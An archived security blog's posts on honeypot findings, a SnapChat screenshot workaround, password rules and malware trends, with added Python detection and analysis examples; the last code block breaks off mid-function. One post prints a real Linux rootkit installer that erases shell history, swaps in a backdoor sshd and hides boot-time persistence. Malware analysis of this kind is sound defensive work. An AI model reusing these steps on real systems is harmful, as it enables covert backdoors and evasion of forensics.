This Blog has Moved!

This blog is moving to


Thank you for visiting! Content will remain here for archival purposes.

Root @th3j35t3r with Google Chrome

Today we're going to have a lesson on password strength and software vulnerabilities.

Disclaimer: Th3J35t3r's site has served targeted malware in the past designed to capture data... especially from members of Anonymous. Perform these steps at your own risk!

There's something interesting afoot on The Jester's website...


In the upper right corner there's a little "Pi" symbol.  If you've ever watched the movie "The Net" you know that interesting secrets are beneath the Pi symbol.






After clicking on the Pi icon you are presented with a UNIX style login prompt.





The login prompt allows you to log in with the username "guest" and no password.  However, any attempt to log in as "root" is met with a password prompt.

Snapchat Covert Screen Capture for Android Revealed

Capture of a SnapChat image.

At a family gathering today, a relative introduced me to SnapChat, and showed me how it only temporarily stores images, then deletes them when you're finished looking at them.


For those who don't know, SnapChat is a "temporary" image service.  The concept is simple - images are sent, viewed, and destroyed within 10 seconds.  If a user attempts to take a screenshot of the image, the sender is sent a notification.  I tested the "screenshot detection" and sure enough...if you take a screenshot with your Android phone, it really does send a notification!

It was recently revealed that there is a method of capturing SnapChat images for iOS without the sender knowing by accessing the files directly on the device's storage drive.  But this only works on iPhone or iPod Touch.

Always up for a challenge, I decided to see if I could bypass SnapChat's "temporary" storage and save a permanent copy of photos I receive.


After performing some analysis of how SnapChat works, today I'm going to reveal how to permanently save incoming SnapChat photos on any Android phone.

Android phones have a feature called "USB Debugging" which is commonly only used by tech savvy users or developers.  This feature allows you to connect your Android phone to your computer and monitor its activities using the Android SDK.

One of the features of the Android SDK is, you guessed it, a screen capture utility.

By simply following these instructions from AddictiveTips.com you can capture the current screen without alerting the SnapChat app.  Simply time clicking the "Refresh" button just right and you'll be able to capture that "secret" photo.

Note that this is not a flaw in the SnapChat app - this is the intentional design of the Android operating system.

This is a "high tech" method of defeating SnapChat.  A "low tech" undetectable method would be to simply take a picture of your phone's screen using a camera from another device.

So what should users take away from this? A simple security lesson - if you don't want someone to be able to save something you send them, and don't want to risk that knowledge or picture being posted publicly, then don't send it to anyone in the first place.

How (not) to handle software vulnerability submissions

If you're a software vendor developing programs more complex than "Hello World", eventually you will face an issue with a security vulnerability in your products.

For those who don't know, I currently have an automated crawler searching Pastebin for new exploits and vulnerabilities.  This crawler reports its results live via the Twitter hashtag #exploitAlert. Every once in a while, if something catches my attention, I'll submit it to the software vendor.

For most vendors the process is very straightforward...just send an email or fill out a form.  For an example of the right way to allow submissions of security vulnerabilities take a look at Microsoft's method.

Recently a supposed "0 day" vulnerability for Parallels Plesk was found by my crawler (a permanent copy of this paste is available here).  I've never worked with Parallels software before, so I went to their website to try and find out where to submit a vulnerability.  Finally I found it was an option on their support form.

My jaw dropped when I saw the warning at the bottom of the support form...


Well that certainly puts a stopper on things.  I'm not a paying customer...so obviously I won't be able to continue.  And what's even worse...if I was a paying customer...I would be CHARGED for submitting a security vulnerability!

Policies such as the one above will only cause frustrated users to post the vulnerability publicly instead of through responsible disclosure.

If anyone from Parallels reads this I would like to encourage you to push for reform of your vulnerability submission practices.

Detecting Targeted Malware and Advanced Persistent Threats

When dealing with malware, typically your last line of defense is your antivirus.  In order for malware to slip past antivirus scanning software, the malware needs to first bypass your perimeter network defenses, such as Network Intrusion Prevention System (NIPS) and network firewall, as well as your Host Intrusion Prevention System (HIPS) and host based firewall.  Multiple layers of protection should block a large number of threats to your organization.

Typically, most of the malware which will bypass all of your security layers is targeted malware...never before seen in the wild.  If the malware is advanced enough, it will be able to slip past your heuristics defenses, and since it has never been seen in the wild, will go unnoticed by your signature based antivirus scans.

If you're fortunate enough to detect some sign of trouble, the first thing you should do is begin checking common malware load points.  Don't bother trying to look for the proverbial "needle in a haystack" and find the file which infected your system.  Be aware that there are only a few load points which will be used by malware, and begin your search there.

Linux Rootkit "bum.pdf" dropped onto my Honeypot Today

A malicious user from Romania using PuTTY dropped off a Linux rootkit on my honeypot today.

From my initial analysis it appears that the rootkit installs a hidden SSH server running on port 10001.

I haven't had much time to look through the entire package but if you'd like to browse what was dropped off I have uploaded everything to CaffSec-Malware-Analysis.

If you find anything interesting, please feel free to post a comment.


UPDATE: I have found a related article on TMCNET.com talking about a backdoor installed on port 10001.  Read the article here: http://blog.tmcnet.com/blog/tom-keating/asterisk/hacked-asterisk-pbx-update.asp


Here is the install script for the main payload.  Interesting stuff!

#!/bin/bash
# Anti-forensics: keep this session out of the shell history file
unset HISTSAVE
unset HISTFILE
unset SAVEFILE
unset history
# Drop a bundled libcrypto.so.4 into /lib (presumably a dependency of the replacement sshd)
mv libcrypto.so.4 /lib/
# Replace the legitimate zdump binary with the backdoor sshd, then set the
# immutable/append-only/undeletable attributes so it survives casual cleanup
chattr -suia /usr/sbin/zdump
rm -rf /usr/sbin/zdump
mv sshd /usr/sbin/zdump
chattr +suia /usr/sbin/zdump
# Unpack the rest of the kit into a hidden directory under /usr/include/X11
mkdir -p /usr/include/X11/.swap/
tar xvfz pic.tar.gz -C /usr/include/X11/.swap/ >>/dev/null
# "sounds.h" is an executable launcher disguised as a header file; run it now...
mkdir -p /usr/include/sound
mv sound.so /usr/include/sound/
mv sounds.h /usr/include/sound/
chmod 770 /usr/include/sound/sounds.h
/usr/include/sound/sounds.h
# ...and append it to rc.sysinit, behind innocuous-looking comments, so it runs at every boot
echo "# Now that we have all of our basic modules loaded and the kernel going,">>/etc/rc.sysinit
echo "# let's dump the syslog ring somewhere so we can find it later" >>/etc/rc.sysinit
echo "/usr/include/sound/sounds.h" >>/etc/rc.sysinit
sleep 10
echo "Enjoy your new box on port 10001"
# Remove the dropper directory
cd ..
rm -rf rks*
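The script above is a ready-made list of host indicators, and checking them is exactly the "start with the load points" approach recommended in the Detecting Targeted Malware post further up: the hidden directory, the fake header file, the line appended to /etc/rc.sysinit, and the listener on port 10001. The Python below is an added example of my own, not tooling from the blog or the malware sample; the indicator paths and port come from the script, while the /proc/net/tcp excerpt and the temporary directory tree that stands in for an infected host are constructed for the demonstration.

```python
import os
import tempfile

# Paths the install script touches; checking them is cheaper than hunting for the
# dropper itself, which is the "look at the load points first" advice.
INDICATOR_PATHS = (
    "usr/include/X11/.swap",          # hidden directory unpacked from pic.tar.gz
    "usr/include/sound/sounds.h",     # executable "header" that launches the backdoor
    "usr/include/sound/sound.so",
)
RC_SYSINIT = "etc/rc.sysinit"         # boot-time load point the script appends to
BACKDOOR_PORT = 10001                 # "Enjoy your new box on port 10001"


def scan_filesystem(root="/"):
    """Return findings for the script's artifacts under `root`; passing a
    mount point lets the same check run against a disk image or a test tree."""
    findings = []
    for rel in INDICATOR_PATHS:
        if os.path.lexists(os.path.join(root, rel)):
            findings.append(f"artifact present: /{rel}")
    rc = os.path.join(root, RC_SYSINIT)
    if os.path.isfile(rc):
        with open(rc, errors="replace") as fh:
            for lineno, line in enumerate(fh, 1):
                if "/usr/include/sound/sounds.h" in line or "syslog ring" in line:
                    findings.append(f"persistence: {RC_SYSINIT}:{lineno}: {line.strip()}")
    return findings


def listening_ports(proc_net_tcp_text):
    """Parse the text of /proc/net/tcp and return the ports in LISTEN state (st == 0A)."""
    ports = set()
    for line in proc_net_tcp_text.splitlines()[1:]:      # first line is the column header
        fields = line.split()
        if len(fields) < 4:
            continue
        local, state = fields[1], fields[3]
        if state == "0A":
            ports.add(int(local.rsplit(":", 1)[1], 16))   # port is hex after the colon
    return ports


def scan_listeners(proc_net_tcp_text):
    """Flag the backdoor port if something is listening on it."""
    if BACKDOOR_PORT in listening_ports(proc_net_tcp_text):
        return [f"listener on tcp/{BACKDOOR_PORT} (backdoor sshd port)"]
    return []


# Constructed /proc/net/tcp excerpt: a normal sshd on 22 (0x0016), the backdoor
# on 10001 (0x2711), and one established connection that must not be counted.
SAMPLE_PROC_NET_TCP = """  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1234 1 0000000000000000 100 0 0 10 0
   1: 00000000:2711 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 5678 1 0000000000000000 100 0 0 10 0
   2: 0100007F:0016 0100007F:C350 01 00000000:00000000 00:00000000 00000000     0        0 9012 1 0000000000000000 20 4 30 10 -1
"""


def demo():
    """Build a constructed tree that mimics an infected host, scan it, return the findings."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "usr/include/X11/.swap"))
        os.makedirs(os.path.join(root, "usr/include/sound"))
        open(os.path.join(root, "usr/include/sound/sounds.h"), "w").close()
        os.makedirs(os.path.join(root, "etc"))
        with open(os.path.join(root, RC_SYSINIT), "w") as fh:
            fh.write("# normal init content\n")
            fh.write("/usr/include/sound/sounds.h\n")   # the line the script appends
        return scan_filesystem(root) + scan_listeners(SAMPLE_PROC_NET_TCP)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
    # On a live host: scan_filesystem("/") and scan_listeners(open("/proc/net/tcp").read())
```

The filesystem check deliberately takes a root prefix so it can be pointed at a mounted image from a clean system; on the compromised host itself a rootkit that hooks the file and socket APIs can hide these artifacts, which is why /proc/net/tcp and the rc.sysinit contents are worth comparing against what `netstat` and `cat` report.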

Perpetual Efforts in Futility - A History of Computing Security

I've threatened to do this for a while now...and I've finally got the motivation to do so.

I always said one of these days I need to write a book on all the crazy computer stuff I've seen over the years.  But then it dawned on me...there is no real "timeline" out there of the history of computing security.  Sure, some of it is interlaced between the pages of other computing history books or sites...but security is always an afterthought...a footnote.

So why "Perpetual Efforts in Futility"?  I've had that name picked out for years.  Security has always been a cat-and-mouse game of seeing who can outsmart the other.  Malware writers and other malicious individuals are always at odds with the security folks in a perpetual "war" which will never really end.

So, using Blogger, I'm going to begin piecing together a timeline of the history of computing security.  Eventually, when everything is complete to my satisfaction, maybe I'll even publish it as a book.  Who knows!

So without further delay, I present to you my first entry in "Perpetual Efforts in Futility" - an article about the very first computer worm "Creeper".


Please be sure to check "Perpetual Efforts in Futility" for future updates!

Google Two Factor Authentication - Protect Your Gmail and Google+ Account!

Have you secured your Google account with two-factor authentication yet?

If you have a smartphone such as a BlackBerry, Android or iPhone, you can easily add an extra layer of protection to your Google account, including Gmail and Google+.

The authenticator app is available at no charge whatsoever.  Google provides instructions on how to install the app based upon your phone.

Once set up, you will be asked for a time-sensitive PIN, provided by your smartphone, when logging into your Google account.

Even if your account password is stolen or guessed your account will be secure!

Read more at Google's 2-step verification page.

Threat Watch updated to include Malware Indicator Trends

I've updated the Threat Watch page to include global home-based malware infection indicators. Please note that this feature is still experimental. You can also read more about how I created this map and graph.

FDA Fails to Properly Evaluate Medical Device Security per U.S. GAO Report

Warning: The contents of this blog post could (literally) give you a heart attack.

The U.S. Government Accountability Office website has published an interesting report on Information Security and Medical Devices.  Unfortunately this report has probably been missed amid all the U.S. elections news.

The 62 page report calls out the FDA on their 2001 and 2006 premarket review of two medical devices with known vulnerabilities and states that "FDA considered information security risks from unintentional threats, but not risks from intentional threats".  While it is comforting to know that the FDA is looking at issues such as accidental electromagnetic interference, it worries me that the FDA is not considering more serious threats, such as intentional malicious interference with a device.

Specifically, FDA considered risks from unintentional threats for four of the eight information security control areas GAO selected for its evaluation—software testing, verification, and validation; risk assessments; access control; and contingency planning. However, the agency did not consider risks from intentional threats for these areas, nor did the agency provide evidence of its review for risks from either unintentional or intentional threats for the remaining four information security control areas—risk management, patch and vulnerability management, technical audit and accountability, and security-incident-response activities. According to FDA, it did not consider information security risks from intentional threats as a realistic possibility until recently. In commenting on a draft of this report, FDA said it intends to reassess its approach for evaluating software used in medical devices, including an assessment of information security risks.

This report is definitely an eye opening read, and also shows that the Federal Government is starting to think outside the box when it comes to Information Security.

Report:
Highlights - FDA Should Expand Its Consideration of Information Security for Certain Types of Devices


Download Full Report (PDF)

Hurricane Sandy Fake Webcam - A Social Engineering Experiment

Yesterday I decided to perform a bit of a social engineering experiment on USTREAM.

I provided "live" coverage of Hurricane Sandy from space.


Keccak Chosen by NIST as SHA-3 Hashing Algorithm

The National Institute of Standards and Technology has chosen Keccak as the winner of the SHA-3 hashing competition!

You can read more about Keccak at the official web site.

Free trial of VIPRE Antivirus Business

Discover first hand, the benefits of this security solution for your company.
VIPRE Antivirus Business is the cost-effective and easy-to-manage business virus protection for small- and medium-sized businesses. It's easy to set up and use via an intuitive management console. It's the business antivirus built with IT administrators in mind. Try VIPRE free for 30 days to see how this security solution can benefit your organization.

This offer is intended for business use only. 

IE Zero Day and Increase in Global Malware Indicators

A look at the last 30 days of web searches for common malware infection indicators shows that the Internet Explorer Zero Day vulnerability has been in the wild since possibly September 12, 2012, or possibly as far back as September 8.

On September 11, the indicator search volume was at 67 on a sliding scale.  As of September 16, 2012 (the last day Google provides search data for at this time), the search volume had increased to 94.

The search volume had peaked on September 2, and was on a fairly steady decline since, with the exception of a brief spike in search activity on September 8.

IE Zero Day Exploit in the Wild

There is an IE exploit in the wild which affects IE 7, 8, and 9.

For more information, see the SANS ISC post.

How Not to Redact a Document

In case you didn't know, Zynga and EA have been in a legal battle over copying each other's games.

Zynga has posted publicly an answer to EA's accusations as well as a demand for jury trial.  Also posted was a counterclaim with redacted sections.



However, Zynga's legal team did a very poor job of redacting the documents.  Instead of removing the redacted text, they simply set its background to black.  The original redacted text can be revealed by highlighting the text.


It's very important that document redaction methods be properly reviewed by the IT staff prior to release.  Without proper review of methods, sensitive information could be revealed, which could possibly cost an organization millions.

Related Reading:
A Primer On Electronic Document Security

Zombie Alert - How to Survive the Coming Zombie Apocalypse

Every day I come across interesting "personal security" stuff that just doesn't fit with the theme of this blog.

In response to this, I have started a blog called "How to Survive the Coming Zombie Apocalypse".  My goal is to make this a humorous, yet useful resource for personal security, preparedness, and self defense.

I hope you enjoy the blog, as I have great plans for it.

The Anonymous Lies Keep Building - GoDaddy and Apple


UPDATE 9/11/2012: Anonymous Own3r is a fraud.  The GoDaddy outage was caused by an internal router issue, and not a hacking or denial of service attack. 

EDITOR'S NOTE: As of writing this article, "Anonymous Own3r" has not provided proof that he/she was responsible for this attack.

Earlier this year I wrote about an Anonymous plan to take down the internet through a massive Denial of Service attack against the root DNS servers, and how to take steps to avoid being affected.  However, this attack never impacted anyone.

Today a member of the group Anonymous, who goes by "Anonymous Own3r", claimed responsibility for knocking GoDaddy's DNS servers offline.  According to the hacker (now shown to be a fraudster), he/she acted alone in this attack, and it was not assisted by the Anonymous collective.  However, no explanation has been posted as to how he/she took down GoDaddy's DNS servers, and further investigation reveals that Anonymous Own3r is a fraud and was not responsible.

This revelation comes on the same day that it was revealed that the leaked Apple device IDs came from a US company, BlueToad, instead of the FBI as Anonymous had claimed.

According to Netcraft.com the GoDaddy outage lasted approximately 3.25 hours, and affected eight out of GoDaddy's ten hosting locations.


While the percentage of the Internet affected by this attack is not clear, what is clear is that the thousands of web sites and email servers hosted by GoDaddy went dark today during business hours, wreaking havoc on businesses relying on GoDaddy for their web and email presence.

Do your Disaster Recovery Plan and Business Continuity Plan cover a massive outage at your hosting provider?  If not, now would be a good time to add one, especially if your organization relies on web and email for its critical business functions.

Related Reading:
Solution Brief: Disaster Recovery
Pre-Testing Disaster Recovery and Business Continuity Plans
Recent Lessons in Disaster Recovery

Mission Critical (FREE Subscription!)

How to Choose the Right Antivirus and Firewall

Antivirus and firewall software are very important protection for all systems, home or business.

If you don't have a budget to purchase software, there are some excellent free programs available.  Please note that I am only going to be discussing Windows in this post, as Mac or Linux AV is a completely different subject worthy of a future blog post.

The first product you should consider is ZoneAlarm Antivirus+Firewall.  This lightweight combination is perfect to maximize protection while minimizing performance impact.
However, if you do not want a combination Antivirus+Firewall, it's perfectly acceptable to use ZoneAlarm's standalone firewall product with another antivirus product...but I strongly recommend at a minimum using ZoneAlarm's firewall, as I have yet to find a comparable firewall product for free.

If you're looking for an alternative to ZoneAlarm's antivirus, there are many available.
First on the list is AVG (which you can download directly here).
Second is Microsoft Security Essentials, which requires a legitimately licensed copy of Windows
Third is ClamWin, an open source antivirus program which is extremely lightweight but does not feature an on-access scanner.

If you have a budget to afford antivirus at home, or need to protect your business, VIPRE has written a guide on choosing the right antivirus solution for your business.




By the way, if you'd like to support this blog, feel free to make a purchase through our Software Catalog.

Learnist: Share What you Know

Today I received a perk from Klout.com for an invitation to join "Learnist".

While I'm under no obligation to actually write about the perk, I really wanted to share this with everyone.

I have to say, I'm very impressed.

It's a massive community of learning and sharing...all at your own pace, with no pressure to pass tests or earn certificates.

I've setup a "Cyber Security Tips and Tricks" board, and began adding my own how-to articles, as well as other useful resources online.

I encourage you to look into the site, and request an invite!

Using Google Insights to Track Computer Virus Outbreaks


Google.org currently maintains "Google Flu Trends" which works by looking at search keywords as indicators of flu activity.

I've been doing some thinking recently, and why not apply the same to computer virus outbreaks?


I'm still trying to refine the search keywords, but there's a good article on CNet which might provide some starter info.

Based upon the article, I've created the following string for Insights. Note that Insights treats + as a logical OR...

"computer virus infection" + "computer slow" + "computer crashes" + "program opens slow" + "annoying popups" + "is symantec.com down" + "is mcafee.com down" + "is trendmicro.com down" + "can't update antivirus"
It's important to note, however, that using the above search string alone will not produce the "global infection map" we're looking for.  This only looks at English-language searches, and does not include searches in other languages.  We can however use this string to create a nice map showing infection trends in the United States over the past year.

Since most infections result in searches such as "why is my computer slow", here is a multi-lingual search string:
computer slow + ordinateur lent + ordenador lento + bilgisayar yavaş + コンピューターが遅い + 느린 컴퓨터 + 计算机速度慢 + computer langsom + 電腦速度慢 + компьютер медленно + powolny komputer + بطء جهاز الكمبيوتر

If the above string is accurate enough to indicate that the user is infected with a virus, then we can view global infection trends for home users.

We can try to validate this data by looking at October 2008 through February 2009, when Conficker was infecting the most computer systems.  Conficker started infecting computers in November, 2008, and in January 2009 reached a peak of possibly 15 million infections.



More importantly, we can use the data for the past 30 days to monitor for spikes in activity, which would indicate a possible malware infection is spreading in the wild.

We can also use this data to create a rather interesting global history of malware infections.

Why Wikipedia should never be used as a Technical Reference

There's been a lot of talk about Wikipedia lately over at Slashdot, with regard to Wikipedia shifting from using primary to secondary sources.

When I'm researching a technical issue, and a Wikipedia result is returned, I immediately skip over it.

I used to be able to trust Wikipedia as a "landing page" to find a brief overview of what I'm looking for, then locate additional information.  But not anymore.  There is an ever-growing trend on Wikipedia to create a "leaner" Wikipedia by simplifying articles, combining articles, and deleting articles.

First case in point is the Wikipedia page for "Microsoft Macro Assembler".  As of this blog post, this is a very small page with "History", "Object module formats supported by MASM", "Some third-party tools that support MASM", and "Assemblers compatible with MASM" as the main content sections.

Strangely missing are the details on the actual MASM assembly language.  There's no link to another wiki page.  There may be a few references at the bottom to the language, but nothing in the article itself.

I considered adding to the article, but then I noticed in the history that there used to be a rather excellent overview of the MASM assembly language, but someone deleted it with the following reason:
major cleanup; remove poorly written and messy "MASM assembly language details" section which discusses specific aspects of MASM and is best suited for a user's guide
 
I was really hoping this was a one-off occurrence, but the more I look through Wikipedia, the more saddened I am that the entire community has turned into one large bickering and arguing festival over what needs to be deleted.


Having Fun with the EICAR Test File

For those not familiar with it, the EICAR Test File is a text file commonly used for verifying that antivirus software is working properly.  More info can be found on EICAR.org.

I stumbled upon an interesting bugtraq post from 2003 which I felt was worth sharing.  The post disassembles the EICAR test file and looks at how it works.

Interesting read, especially if you're interested in programming.


Default Facebook Privacy Settings Randomly Not Working

It has come to my attention that the default Facebook privacy settings are not properly functioning at seemingly random times.  Unfortunately you have no idea the settings aren't working correctly until after you post something...



Despite my default setting of "Friends Only", I've noticed multiple posts being available to everyone, as indicated by the globe icon below.


It may be worth checking your old posts to see who has access to them.  You may be surprised to find some of your posts were set to public.

I have posted about this issue on Facebook's support page, but expect little response.

One possible workaround to this issue is to go into your Facebook Privacy Settings, change your post privacy to public, then back to Friends Only.  This appears to have corrected the issue for me, for now.

If anyone else has encountered this issue, I encourage you to post a comment saying whether or not you managed to fix it.

Software Spotlight: Sysinternals RootkitRevealer

So, I'm surprised I didn't know about this little gem of software until today.

Sysinternals has a wonderful piece of software called "RootkitRevealer" which shows "oddities" in the registry and filesystem, indicating a possible hidden rootkit.

Unfortunately, it appears to only support Windows XP/2003.

If anyone knows of similar software which supports Linux/Mac/Vista/7/etc, I'd be very interested to hear about it.  Always looking for new resources for my bag of tricks!

How I cracked the NSA Crypto Challenge in Record Time

The NSA recently released an Android App called the "NSA Crypto Challenge".

Being in the security field, I was very interested in this app.  So of course I decided to give it a try, and see how quickly I could break the codes.  Being ambitious, I decided to jump straight into Advanced mode.  My score? 2 minutes, 43 seconds.


Now for those of you who have played this game on advanced mode, you're probably amazed by the speed with which I was able to decode this.  For those who haven't played it yet, let me show you an example puzzle on "Advanced" mode.


London 2012 Olympics Malware and Scam Alert

It's important to note that with the London 2012 Olympics rapidly approaching, computer users should be on the lookout for spam messages as well as malicious web search results featuring the London 2012 Olympics.

TrendMicro has already found some scams in the wild advertising supposed "free tickets" to the London 2012 Olympics.

An Olympics-themed trojan has already been spreading through social networks.

AVG has a preview of additional malware threats which may be associated with the London 2012 Olympics, as well as some important tips for avoiding an Olympic-themed malware infection.

It is very important to make sure your friends and family know how to look for suspicious links, messages, or emails regarding the Olympics.

Remember the old saying "If it's too good to be true, it probably isn't true."




Printer Malware - The Next Big Threat?

Does your organization secure their printers?

Many modern multi-function printers have their own mini-servers built in, offering web, ftp, and file share access.


These printers, when not properly secured, can pose just as high a security risk as unsecured, non-isolated SCADA devices.

Related Reading:
Indian businesses also affected as office printers hit globally by 'gibberish' computer virus
SANS: Auditing and Securing Multifunction Devices

QR Code Analyzer - Android for the Paranoid

Sometimes the apps available in the marketplace just aren't sufficient for a paranoid person to fulfill their security obsession.

One gap I've found is that there appears to be no app out there to analyze QR codes for malware, outside anti-virus software.


In response to this, using MIT App Inventor, I have created an app which uses VirusTotal.com's API in order to submit QR code URLs for scanning.

Note that this app does NOT address possible security flaws with QR codes themselves.  However, it does submit any URL a QR code contains to VirusTotal, and provides a link to the resulting report.

I encourage you to try out this wonderful new app.

The latest version can be downloaded here:

http://code.google.com/p/caffsec-malware-analysis/downloads/list

Source code is also available:
http://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/tools/QRAnalyzer

New Hacktool Found on my Honeypot "nt"


A script kiddy dropped off a new hack tool on my honeypot today.

Today's guest hails from 77.28.151.190, which is in Macedonia, the former Yugoslav Republic of (MK), in Eastern Europe.



The file dropped off, "rdp.tgz", is a Linux hack tool for remotely cracking Windows FTP and NT file shares.

I was somewhat disappointed that the hack tool isn't more complex; however, since it is still a new hack tool which isn't detected by antivirus software, I figured it was worth mentioning.

I've uploaded a full analysis at:
http://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/nt

Watch my Honeypot LIVE!

I've decided to start streaming my honeypot on UStream.

No set hours for this yet, but it should be interesting when it is live!


Please feel free to check it out over at my UStream Channel.

Also, keep an eye on my Twitter for when I go live!

And you Thought your Password Requirements Were Bad...

Apparently everything is bigger in Texas, including ridiculousness of password requirements...

From http://portal.cs.oag.state.tx.us/OAGStaticContent/portal/login/help/ChangePassword.htm

Remember that the new password must fulfill these requirements:
  1. The password must be exactly 8 characters long.
  2. It must contain at least one letter, one number, and one special character.
  3. The only special characters allowed are: @ # $
  4. A special character must not be located in the first or last position.
  5. Two of the same characters sitting next to each other are considered to be a “set.” No “sets” are allowed.
  6. Avoid using names, such as your name, user ID, or the name of your company or employer.
  7. Other words that cannot be used are Texas, child, and the months of the year.
  8. A new password cannot be too similar to the previous password.
    1. Example: previous password - abc#1234, acceptable new password - acb$1243
    2. Characters in the first, second, and third positions cannot be identical. (abc*****)
    3. Characters in the second, third, and fourth positions cannot be identical. (*bc#****)
    4. Characters in the sixth, seventh, and eighth positions cannot be identical. (*****234)
  9. A password can be changed voluntarily (no Help Desk assistance needed) once in a 15-day period. If needed, the Help Desk can reset the password at any time.
  10. The previous 8 passwords cannot be reused.
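What makes the list above a security problem rather than just an annoyance is how much it shrinks the space of possible passwords. The Python below is an added example of mine, not code from the Texas OAG site: it checks a candidate against rules 1 through 8, and counts exactly how many 8-character strings survive rules 1 to 5 with a dynamic program over character classes (state = class of the last character plus the set of classes used so far), so the policy's effect on brute-force resistance can be quantified rather than guessed. The counter is general, taking any class sizes and length, which is also how its correctness can be cross-checked against brute force on a tiny alphabet. Assumptions, since the page does not say: a "letter" is A-Z or a-z, rule 7 words are matched as case-insensitive substrings, and rule 6 names are supplied by the caller.

```python
import calendar
import string

LENGTH = 8                        # rule 1
SPECIALS = "@#$"                  # rule 3
LETTERS = string.ascii_letters    # assumption: "letter" means A-Z and a-z
DIGITS = string.digits
ALLOWED = LETTERS + DIGITS + SPECIALS
# rule 7, matched case-insensitively as substrings (assumption about how the site checks)
FORBIDDEN_WORDS = ("texas", "child") + tuple(m.lower() for m in calendar.month_name[1:])
# rule 8: position windows (1-based 1-3, 2-4, 6-8) that may not repeat the previous password
SIMILARITY_WINDOWS = (("8.2", 0, 3), ("8.3", 1, 4), ("8.4", 5, 8))


def check_password(pw, previous=None, user_names=()):
    """Return the rules a candidate password violates (empty list = accepted)."""
    problems = []
    if len(pw) != LENGTH:
        problems.append("1: must be exactly 8 characters")
    if not (set(pw) & set(LETTERS) and set(pw) & set(DIGITS) and set(pw) & set(SPECIALS)):
        problems.append("2: needs a letter, a digit and a special character")
    if any(c not in ALLOWED for c in pw):
        problems.append("3: only @ # $ are allowed as special characters")
    if pw and (pw[0] in SPECIALS or pw[-1] in SPECIALS):
        problems.append("4: special character in first or last position")
    if any(a == b for a, b in zip(pw, pw[1:])):
        problems.append("5: identical adjacent characters form a set")
    low = pw.lower()
    if any(name and name.lower() in low for name in user_names):
        problems.append("6: contains a user, company or employer name")
    if any(word in low for word in FORBIDDEN_WORDS):
        problems.append("7: contains a forbidden word")
    if previous is not None:
        for label, start, stop in SIMILARITY_WINDOWS:
            if pw[start:stop] == previous[start:stop]:
                problems.append(f"{label}: positions {start + 1}-{stop} repeat the previous password")
    return problems


def count_passwords(class_sizes=None, length=LENGTH):
    """Exact number of strings satisfying rules 1-5, by dynamic programming over
    character classes; all characters of one class are interchangeable for the count."""
    if class_sizes is None:
        class_sizes = {"letter": len(LETTERS), "digit": len(DIGITS), "special": len(SPECIALS)}
    dp = {}
    for cls, size in class_sizes.items():
        if cls != "special":                                  # rule 4: no special first
            dp[(cls, frozenset([cls]))] = size
    for pos in range(1, length):
        nxt = {}
        for (last, seen), ways in dp.items():
            for cls, size in class_sizes.items():
                if cls == "special" and pos == length - 1:    # rule 4: no special last
                    continue
                choices = size - 1 if cls == last else size   # rule 5: cannot repeat the last char
                key = (cls, seen | {cls})
                nxt[key] = nxt.get(key, 0) + ways * choices
        dp = nxt
    # rule 2: every class must appear at least once
    return sum(ways for (_, seen), ways in dp.items() if len(seen) == len(class_sizes))


if __name__ == "__main__":
    print(check_password("acb$1243", previous="abc#1234"))   # the site's own example passes: []
    print(check_password("abc$1243", previous="abc#1234"))   # rule 8.2 fires
    allowed = count_passwords()
    print(f"{allowed:,} passwords satisfy rules 1-5, versus {len(ALLOWED) ** LENGTH:,} "
          f"unconstrained 8-character strings over the same alphabet")
```

Rules 6 through 8 cut the space further for any particular user, and rule 1's fixed length means every attacker knows exactly which length to try; a policy that sets a minimum rather than an exact length, and allows a wider character set, would make each of these counts larger instead of smaller.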

Stuxnet not the first Nation-Sponsored Cyber Attack

Very recently it was revealed that the famous malware Stuxnet was created as a joint operation by the U.S. and Israel.  It's important to point out that this isn't really new, as nations have been waging so-called "cyber warfare" for years now.

Make no mistake, there are plenty of other pieces of malware in existence which have been designed for espionage or sabotage.  One such piece of malware may be the Hutizu malware, which was found on the Caffeine Security honeypot earlier this year.  And this definitely isn't the first time a nation has attacked another through "cyber warfare"...just ask the country Georgia.

While many will condemn "cyber warfare" actions, I personally applaud them.  After all, if a "cyber weapon" such as Stuxnet can be used instead of real weapons, resulting in no loss of human life, then isn't that better than sending in planes and tanks?

What will be interesting is, now that the U.S. and Israel have openly entered the "cyber warfare" arena, how many nations will begin open cyber warfare against them?

There is a Chinese curse "May you live in interesting times."  For those of us in the cyber security field, I have a feeling that curse is now upon us.

Keep an eye out for fake Yahoo Browser Plugins!

According to Sophos, Yahoo! recently released a browser search plugin called Yahoo! Axis for Chrome, Firefox, Safari, and IE 9.

During this release, Yahoo! accidentally included the private key used to sign the packages inside the Chrome extension package.  This means anyone who downloaded the package now has Yahoo!'s private signing key and could make their own copy of the plugin and insert malicious code.

As a safeguard, if you decide to use Yahoo! Axis, download the plugin only from Yahoo's official download site.  Until Yahoo! retires the leaked key and re-signs the extension with a new one, a valid signature on its own proves nothing about where a copy came from.
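The mistake is easy to catch before a package ships, or before you install one. The check below is an added example (not from the Sophos report or from Yahoo!): it unpacks the zip payload of an extension, stripping a CRX container header if there is one, and flags any file that contains PEM private key material or has a key-like name. The sample package, its file names and the placeholder key text are constructed for the demonstration and contain no real key.

```python
import io
import re
import struct
import zipfile

# Added example: scan a packaged browser extension for an embedded private key.
# PEM private keys of any flavour (RSA, EC, PKCS#8, OpenSSH) share this header shape.
PRIVATE_KEY_RE = re.compile(rb"-----BEGIN [A-Z ]*PRIVATE KEY-----")
# File names that have no business inside a shipped extension.
KEY_LIKE_NAME_RE = re.compile(r"\.(pem|key|p12|pfx)$", re.IGNORECASE)


def strip_crx_header(data):
    """Return the zip payload of a .crx (Chrome's signed extension container), or the
    data unchanged if it is already a plain zip. CRX2: magic, version, pubkey length,
    signature length, pubkey, signature, zip. CRX3: magic, version, header length, header, zip."""
    if data[:4] != b"Cr24":
        return data
    (version,) = struct.unpack_from("<I", data, 4)
    if version == 2:
        pubkey_len, sig_len = struct.unpack_from("<II", data, 8)
        return data[16 + pubkey_len + sig_len:]
    if version == 3:
        (header_len,) = struct.unpack_from("<I", data, 8)
        return data[12 + header_len:]
    raise ValueError("unknown CRX version %d" % version)


def find_private_keys(package_bytes):
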